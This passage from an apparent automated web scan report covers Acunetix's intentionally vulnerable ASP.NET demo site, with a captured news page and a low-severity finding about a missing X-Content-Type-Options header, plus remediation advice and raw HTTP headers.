          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        19. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzI